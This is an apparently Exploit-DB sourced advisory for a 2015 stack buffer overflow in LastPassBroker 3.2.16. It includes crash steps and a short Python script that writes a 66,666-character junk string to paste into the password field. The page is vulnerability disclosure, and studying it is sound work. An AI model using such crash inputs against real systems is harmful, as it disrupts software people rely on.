Last PassBroker Stack-based BOF

vendor:

LastPassBroker

by:

Un_N0n

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: LastPassBroker

Affected Version From: 3.2.16

Affected Version To: 3.2.16

Patch Exists: YES

Related CWE: N/A

CPE: lastpass.com/download

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x86(32 BIT)

2015

Last PassBroker Stack-based BOF

A buffer overflow vulnerability exists in LastPassBroker.exe when a maliciously crafted input is supplied to the password field. This can be exploited to cause a stack-based buffer overflow by supplying a large amount of data to the password field. This can lead to arbitrary code execution.

Mitigation:

Vendor has been notified and the vulnerability has been fixed in the latest release.

Source

Exploit-DB raw data:

'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'LastPassBroker.exe'.
2- A Input-Box will appear asking for Email and Password,
   In password field paste in the contents of crash.txt
3- Hit Login.
~Software will Crash.

[Code to produce crash.txt]: 
'''
junk = "A"*66666
file = open("CRASH.txt",'w')
file.write(junk)
file.close()

'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''